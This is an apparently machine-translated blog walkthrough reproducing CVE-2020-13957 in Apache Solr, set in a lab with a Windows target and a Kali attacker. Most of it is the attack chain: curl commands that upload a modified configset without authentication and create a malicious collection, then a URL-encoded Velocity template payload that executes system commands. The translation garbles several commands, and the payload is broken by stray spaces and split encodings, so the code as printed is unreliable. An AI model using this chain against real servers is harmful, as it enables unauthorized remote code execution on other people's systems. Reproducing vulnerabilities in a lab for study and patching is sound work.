Shulou(Shulou.com)05/31 Report--

Apche Solr unauthorized upload vulnerability CVE-2020-13957 recurrence, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

0x00 vulnerability description

An unauthorized upload vulnerability exists in ConfigSet API in certain versions of Solr, which can be exploited by an attacker for remote code execution.

The whole utilization chain process:

Upload configset-- based on configset and upload configset again (skip identity detection)-- create collection-- with new configset and use solrVelocity template for RCE

Scope of influence

Apache Solr 6.6.0-6.6.5

Apache Solr 7.0.0-7.7.3

Apache Solr 8.0.0-8.6.2

0x01 environment building

Solr download address: http://archive.apache.org/dist/lucene/solr/( this reproduction environment is 8.0.0)

Target: win10 IP address: 192.168.41.129

Attack plane: kali IP address: 192.168.41.132

C:\ reproduce\ solr-8.0.0\ bin > solr.cmd start-c

Recurrence of 0x02 vulnerabilities

1. Extract the solr-8.0.0.zip and change the extracted file to the / solr-8.0.0/solr-8.0.0/server/solr/configsets/_default/conf directory, find the solrconfig.xml file, and modify the false of velocity.params.resource.loader.enabled to true, that is:

Name= "params.resource.loader.enabled" > ${velocity.params.resource.loader.enabled:true}

And put the modified solr-8.0.0 into kali

2. Then open the terminal in the server/solr/configsets/_default/conf/ directory in kali and execute the command to package all the files under the conf directory into a compressed file mytest.zip

Zip-r-* > mytest.zip

3. Upload mytest.zip to win10 due to the existence of unauthorized upload in ConfigSet API

Curl-X POST-- header "Content-Type:application/octet-stream"-- data-binary @ mytest.zip http://192.168.41.129:8983/solr/admin/configs?action=UPLOAD&name=mytest

Create a malicious collection based on the new configset obtained by CREATE:

Curl "http://192.168.41.129:8983/solr/admin/collections?action=CREATE&name=mytest2

& numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest "

Enter the address in the browser of kali to execute remote commands using the uploaded collection. Here, whoami is executed.

Http://192.168.41.129:8983/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27) ) + $ex.waitFor () +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($str.valueOf + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.